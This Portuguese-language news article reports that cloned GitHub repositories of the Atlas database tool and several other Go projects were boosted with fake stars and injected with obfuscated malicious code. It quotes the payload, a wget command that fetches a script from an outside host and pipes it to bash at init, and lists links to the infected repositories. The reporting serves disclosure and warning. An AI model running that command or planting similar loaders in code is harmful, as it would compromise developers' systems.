O engenheiro de software israelense Ariel Mashraki publicou ontem um alerta no Reddit informando que alguém copiou seu projeto do GitHub, fez com que ele parecesse mais confiável adicionando estrelas de muitos usuários falsos e, então, “injetou código malicioso de runtime para usuários em potencial”. O projeto de Mashraki (@a8m no GitHub) é o Atlas, uma ferramenta para gerenciar e migrar esquemas de banco de dados usando princípios modernos de DevOps. Segundo ele, o mesmo ataque foi feito em sete outros projetos também. O projeto tem cerca de 4 mil usuários e é muito adotado em soluções com GoLang.
Leia também
Popularidade do MacOS atrai cibercriminosos
Pesquisa CISO Advisor: cenário de cyber 2025
Segundo Mashraki, o problema parece ser grande e “é difícil detectar o impacto total. O invasor ofusca o código, alterando identificadores e embaralhando a ordem da matriz de bytes, então você não pode procurá-lo facilmente no GitHub. Isso torna quase impossível rastrear o impacto total, a menos que o GitHub intervenha e ajude a resolver esse problema (relatei esses repositórios ao suporte do GitHub)”.
O engenheiro indicou “as partes do código malicioso: https://github.com/readyrevena/atlas-provider-gorm/blob/master/gormschema/gorm.go#L403-L412 . Isso basicamente executa o seguinte código no init”:
wget -O - https://requestbone.fun/storage/de373d0df/a31546bf | /bin/bash &
Os outros projetos contaminados que ele localizou foram os seguintes:
- https://github.com/ourspiral/href-counter/blob/master/app.go#L97-L106
- https://github.com/slipperyclos/kubernixos/blob/master/kubeclient/delete.go#L22
- https://github.com/quarterlyairs/shelly-bulk-update/blob/master/main.go#L347
- https://github.com/jadedexpens/atlas-provider-gorm/blob/master/gormschema/gorm.go#L403
- https://github.com/animatedspan/terraform-provider-atlas/blob/master/internal/provider/atlas_migration_data_source.go#L296
- https://github.com/turbulentsu/source-watcher/blob/master/controllers/gitrepository_predicate.go#L71
- https://github.com/likableratio/gonet/blob/master/gonet.go#L227
